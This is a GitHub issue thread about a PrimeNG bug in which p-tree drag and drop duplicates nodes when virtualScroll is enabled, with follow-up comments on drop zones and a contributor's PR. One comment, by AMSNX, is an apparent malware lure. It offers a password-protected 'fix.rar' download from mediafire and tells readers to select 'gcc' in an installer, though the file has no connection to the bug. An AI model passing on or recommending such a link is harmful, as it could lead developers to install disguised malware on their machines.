### ISSUE TITLE
p-tree drag and drop breaks with virtualScroll

### ISSUE THREAD

**Issue by ethan-gerardot** [primefaces/primeng#16296]
### Describe the bug

When you use p-tree and set the virtualScroll property to "true" (and the virtualScrollItemSize to some integer value), then drag and drop feature breaks.

It duplicates the item and adds it to the end of the children for the parent within which you are dragging/dropping.

To be more specific: I have a parent node with 3 child nodes. Let's call the parent A and the nodes 1, 2, 3. If you want to move node 1 to be after node 2, then you drag it and drop it after 2 in the list. But, primeng appears to have a bug: when virtualScroll is on, the dragged and dropped node (1) gets duplicated and put on the end of the list (and the original node remains unmoved). So parent A's children look like: 1, 2, 3, 1. I can print the whole tree data after the move and see that it's duplicated at the end of the child nodes. When I turn virtualScroll off, vualá: it works fine (the node moves to the proper position and is not duplicated). This bug happens regardless of which node you move and where you move it. It's always duplicated and appended to the end of the list.

### Environment

package.json dependencies:
Angular: ^17.0.9
"primeng": "~17.12.0"
chrome 127.0.6533.100

### Angular version

17.0.9

### PrimeNG version

17.12.0

### Build / Runtime

Angular CLI App

### Language

TypeScript

### Node version (for AoT issues node --version)

22.3.0

### Steps to reproduce the behavior

1. Enable virtualScroll in p-tree.
2. Open p-tree component.
3. Drag node and drop it in new location.

### Expected behavior

Should move the node to the proper location but isn't (duplicating at the end of the list no matter what).

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ethan-gerardot** [comment]
I'm also experiencing that there is no distinction in drop zones between ancestor nodes. So it won't tell you whether your dropping after a node within the parent or outside the parent. This is a big problem.

**Comment by zachsteffens** [comment]
> I'm also experiencing that there is no distinction in drop zones at the end of the parent vs outside the parent. So it won't tell you whether you're dropping after the last node in the parent (but still within the parent) or just outside the parent. This is a big problem.
> 
> You can see all these problems in zachsteffens demo (thanks for that; it's a good, helpful demo).

I've created another issue that fully captures this separate problem with a thorough description [here](https://github.com/primefaces/primeng/issues/16349)

**Comment by ethan-gerardot** [comment]
@zach I think my coworker and I may have a fix for this in primeng's code (and it might fix the issue you documented too). I'm planning to put up a PR. Maybe you can try it out when I do.

**Comment by ethan-gerardot** [comment]
@zachsteffens Do you know how I can put up a review for this issue? I tried to push a branch so I could start a PR but it denied me.

```
ethan.gerardot@AMB290344L primeng % git push origin 5a75e698d38f7668bf338d81a5898bdc190d6688:refs/heads/16296
remote: Permission to primefaces/primeng.git denied to ethan-gerardot.
fatal: unable to access 'https://github.com/primefaces/primeng.git/': The requested URL returned error: 403
```

**Comment by ethan-gerardot** [comment]
@zachsteffens I put up a PR for this, so you can test my forked branch: https://github.com/primefaces/primeng/pull/16391

**Comment by zachsteffens** [comment]
> @zachsteffens I put up a PR for this, so you can test my forked branch: #16391

Excellent, I'll take a look.

**Comment by a-coors** [comment]
I have the same bug with primeng version 19.1.4
